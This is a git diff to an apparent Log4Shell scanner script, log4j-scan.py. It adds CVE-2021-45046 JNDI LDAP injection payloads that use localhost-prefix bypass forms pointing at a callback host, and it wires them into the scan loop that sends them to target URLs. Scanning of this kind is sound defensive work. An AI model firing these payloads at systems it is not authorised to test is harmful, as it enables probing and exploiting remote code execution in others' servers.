diff --git a/log4j-scan.py b/log4j-scan.py index 091b384..120f07e 100755 --- a/log4j-scan.py +++ b/log4j-scan.py @@ -16,6 +16,7 @@ from urllib import parse as urlparse import base64 import json +import random from uuid import uuid4 from base64 import b64encode from Crypto.Cipher import AES, PKCS1_OAEP @@ -60,7 +61,9 @@ ] cve_2021_45046 = [ - "${jndi:ldap://127.0.0.1#{{callback_host}}:1389/{{random}}}" # Source: https://twitter.com/marcioalm/status/1471740771581652995 + "${jndi:ldap://127.0.0.1#{{callback_host}}:1389/{{random}}}", # Source: https://twitter.com/marcioalm/status/1471740771581652995, + "${jndi:ldap://127.0.0.1#{{callback_host}}/{{random}}}", + "${jndi:ldap://127.1.1.1#{{callback_host}}/{{random}}}" ] @@ -71,7 +74,7 @@ action='store') parser.add_argument("-p", "--proxy", dest="proxy", - help="Send requests through proxy. proxy should be specified in the format supported by requests (http[s]://:)", + help="send requests through proxy", action='store') parser.add_argument("-l", "--list", dest="usedlist", @@ -130,7 +133,6 @@ if args.proxy: proxies = {"http": args.proxy, "https": args.proxy} - def get_fuzzing_headers(payload): fuzzing_headers = {} fuzzing_headers.update(default_headers) @@ -162,6 +164,14 @@ def generate_waf_bypass_payloads(callback_host, random_string): payloads.append(new_payload) return payloads +def get_cve_2021_45046_payloads(callback_host, random_string): + payloads = [] + for i in cve_2021_45046: + new_payload = i.replace("{{callback_host}}", callback_host) + new_payload = new_payload.replace("{{random}}", random_string) + payloads.append(new_payload) + return payloads + class Dnslog(object): def __init__(self): @@ -276,7 +286,9 @@ def scan_url(url, callback_host): if args.waf_bypass_payloads: payloads.extend(generate_waf_bypass_payloads(f'{parsed_url["host"]}.{callback_host}', random_string)) if args.cve_2021_45046: - payloads = cve_2021_45046 + cprint(f"[•] Scanning for CVE-2021-45046 (Log4j v2.15.0 Patch Bypass - RCE)", "yellow") + payloads = get_cve_2021_45046_payloads(f'{parsed_url["host"]}.{callback_host}', random_string) + for payload in payloads: cprint(f"[•] URL: {url} | PAYLOAD: {payload}", "cyan") if args.request_type.upper() == "GET" or args.run_all_tests: @@ -337,7 +349,7 @@ def main(): dns_callback_host = "" if args.custom_dns_callback_host: cprint(f"[•] Using custom DNS Callback host [{args.custom_dns_callback_host}]. No verification will be done after sending fuzz requests.") - dns_callback_host = args.custom_dns_callback_host + dns_callback_host = args.custom_dns_callback_host else: cprint(f"[•] Initiating DNS callback server ({args.dns_callback_provider}).") if args.dns_callback_provider == "interact.sh": @@ -362,7 +374,7 @@ def main(): time.sleep(int(args.wait_time)) records = dns_callback.pull_logs() if len(records) == 0: - cprint("[•] Reachable Targets do not seem to be vulnerable.", "green") + cprint("[•] Targets does not seem to be vulnerable.", "green") else: cprint("[!!!] Target Affected", "yellow") for i in records: